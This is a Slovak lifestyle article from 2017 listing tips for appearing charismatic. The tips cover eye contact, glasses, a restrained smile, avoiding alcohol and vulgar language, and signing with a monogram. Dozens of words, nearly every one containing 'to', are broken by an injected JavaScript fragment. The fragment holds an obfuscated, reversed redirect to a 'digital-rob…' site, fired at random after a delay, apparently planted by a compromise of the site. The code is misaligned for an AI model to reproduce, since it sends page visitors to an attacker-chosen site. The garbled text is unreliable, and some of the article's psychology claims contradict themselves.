Ako získať charizmu?

| marec 14, 2017

Veľa sa o nej hovorí, no takmer niktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to ju nevie presne definovať. Charizma je čosi ťažko uchopiteľné – akoby šlo o neviditeľnú auru, ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torá vyžaruje z určitých ľudí a akoby autobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tomaticky im získava rešpekt, pozornosť a obdivo ostatných kdekoľvek, kam prídu.

Charizma je neoceniteľná sociálna zručnosť. Pomôžu vám ju získať drobné, avšak podstatné maličkosti.

Čo sa ale o charizme nehovorí je fakt, že ide o zručnosť, ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torá sa dá získať. Niktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to sa s ňou tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}totiž nerodí a pre úspešných ľudí ide o neoceniteľnú vlastnosť, rozhodujúcu o tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tom, či sa situácia v spoločnosti, v ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torej sa ocitnete, bude vyvíjať vo váš prospech.

Prvý dojem môžeme urobiť len raz a podprahovo ovplyvňuje celý ďalší prístup protistrany. Ukladá sa tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}totiž do podvedomia a úložných zásuviek v pamäti. Ako si získať pozornosť okolia maličkosťami, doporučovanými psychológmi? Tu je zoznam overených trikov – samo o sebe ide o drobnosti, no dokopy dokážu výrazne napomôcť pri budovaní charizmy a napomáhaní úspechu – či už idete na pohovor, pracovné stretnutie či neformálnu schôdzku.

Oči otvorené dokorán 

Podľa odborníkov na reč tela ľudia, ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torí žmúria oči, alebo majú poklesnuté viečka, pôsobia menej seriózne a dôveryhodnejšie ako tí, ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torí ich majú otvorené dokorán. Poklesnuté viečka tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}totiž znamenajú, že je človek unavený, v strese či trpí depresiami.

Štíhlosť 

Niektobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toré rysy, napríklad úzka tvár, nos a pretiahnutá brada, sú vo všeobecnosti vnímané ako zaujímavejšie, než zaguľatenejšia tvár. Ľudia so štíhlejšou tvárou sú tiež vnímaní ako inteligentnejší. 

Abstinencia 

Výskumníci z univerzity v Pensylvánii tvrdia, že ľudia, ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torí sú častejšie videní s pohárom alkoholu v ruke, vytvárajú menej charizmatický dojem v porovnaní s tým, ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torí sa s ním nenechávajú vidieť vôbec, prípadne zriedka. 

Okuliare

Nie nadarmo sa považujú za symbol intelektuálov. Štúdia z roku 2011 ukázala, že ak nosíte okuliare (hoci s čírymi sklami), pôsobíte nielen inteligentnejšie, ale aj zvodnejšie. A ešte jedna zaujímavosť – tentobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to účinok je tým väčší, čím výraznejšie a hrubšie rámy sa na vašich okuliaroch nachádzajú.

Striedmy úsmev

Usmievanie sa od ucha k uchu na charizme nepridáva. Jemný a decentný úsmev už áno. Čím neprirodzenejšie sa tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}totiž budete usmievať, tým viac môže okolie nadobudnúť pocit, že skrývate stres či zlú náladu. Nasaďte pretobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to ľahký úsmev a šetrite ním.

Nerozprávajte vulgárne

Hrubé slová sú bežnou súčasťou slovníka a tu a tam vykĺzne každému. Ak však chcete v spoločnosti pôsobiť charizmaticky, vyhýbajte sa im. 

Očný kontakt 

Psychológovia tiež radia udržiavať s diskutujúcou protistranou častý očný kontat. Je tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to vraj najlepšia známka sebavedomia, istobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toty a inteligencie. 

Monogram

Podpisujete sa celým menom? Alebo len menom a počiatobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}točným písmenom priezviska? Alebo naopak? Britskí vedci zistily, že ľudia, ktobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}torí sa podpisujú len svojim monogramom, vytvárajú dojem, že sú suverénni, atraktívni, ekonomicky založení a známi.

Fotobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to: thejoycircuit.co.uk

Tags:

Category: HOMEPAGE, KARIÉRA

Comments are closed.